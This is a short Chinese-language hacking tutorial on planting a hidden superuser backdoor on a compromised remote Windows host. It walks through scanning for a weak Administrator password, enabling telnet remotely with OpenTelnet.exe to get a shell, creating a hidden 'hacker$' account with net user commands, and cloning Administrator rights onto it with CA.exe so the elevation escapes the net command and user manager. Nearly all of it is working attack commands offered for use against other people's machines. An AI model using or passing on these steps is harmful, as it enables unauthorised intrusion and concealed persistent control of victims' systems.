一、利用帐户克隆工具来创建
　　Clone Administrator（CA.exe），利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号（此普通帐号必须已经存在）。克隆得到的帐号具有和系统内置的Administrator同样的设置，并且用NET命令或者用户管理器也发现不了其权限已经被提升，是一个不错的ROOT KIT。
　　现在，我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。
　　
　　利用流光、SuperScan等进行扫描，假设已经扫描到一远程主机的Administrator帐户，其密码为123。我们可以使用DameWare Mini Remote Control（简称DMRC），在图形界面（GUI）中来远程控制远程主机。也可以使用OpenTelnet.exe工具来开启远程主机的TELNET服务，其命令格式为：OpenTelnet.exe \\server username password NTLMAuthor telnetport，使用命令：opentelnet \\192.XX.XX.2 Administrator "123" 0 99，呵呵，没想这么成功容易就开启肉鸡的TELNET吧！接着使用命令：Telnet 192.XX.XX.2 99，输入帐户及密码，成功获取一SHELL。
　　

　　首先想办法查看一下有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然也会禁用其他用户。在图形界面下，非常容易识别，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下，只能使用命令：“net user 用户名”一个一个来查看用户是否被禁用。如果懒得这样麻烦，可自行建立一个新的帐户，命令为：“Net user hacker$ youkou /add”，然后使用命令：“Net user hacker$ /active:no”来停用此帐户。
　　

　　断开与远程主机的连接，用小榕的超级用户克隆程序CA.exe，将被禁用的用户hacker$克隆成超级用户，命令为：CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou，成功！
　　

　　这时，hacker$就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。但还是得检查一下，用CCA.exe，命令如下：cca \\192.XX.XX.2 administrator 123。